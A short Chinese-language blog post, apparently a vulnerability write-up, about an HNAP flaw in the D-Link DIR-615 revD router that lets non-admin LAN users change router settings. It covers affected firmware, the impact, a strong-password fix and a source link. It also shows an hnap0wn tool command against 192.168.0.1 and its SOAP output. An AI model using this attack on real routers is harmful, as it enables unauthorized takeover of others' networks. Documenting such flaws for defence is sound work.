D-Link DIR-615 revD HNAP Vulnerability

由 Atom_Kid · 发布日期八月 8, 2019 · 已更新八月 8, 2019

漏洞概述

DIR-615 revD路由器在实现HNAP（家庭网络管理协议）时存在缺陷，导致经常被忽视的普通用户可以执行管理员操作，如修改管理员密码。

影响版本

DIR-615 revD UK V4.11

攻击方式

使用hnap0wn工具攻击

$ ./hnap0wn 192.168.0.1 xml/SetDeviceSettings.xml
Trying SOAPAction header exploit...
SOAPAction header exploit failed! Trying privilege escalation exploit...

<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
<SetDeviceSettingsResult>REBOOT</SetDeviceSettingsResult>
</SetDeviceSettingsResponse>
</soap:Body>
</soap:Envelope>

漏洞影响

默认密码或弱口令用户，LAN内网所有人都可以控制路由器

漏洞修复

设置强密码

参考资料

http://www.devttys0.com/wp-content/uploads/2010/12/dir615_revD_uk_hnap.pdf

一	二	三	四	五	六	日
« 6月
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30	31

D-Link DIR-615 revD HNAP Vulnerability

漏洞概述

影响版本

攻击方式

漏洞影响

漏洞修复

参考资料

您可能还喜欢...

近期文章

分类目录

D-Link DIR-615 revD HNAP Vulnerability

漏洞概述

影响版本

攻击方式

漏洞影响

漏洞修复

参考资料

您可能还喜欢...

栈溢出shellcode编写

栈溢出jmp esp原理

ARP协议

近期文章

分类目录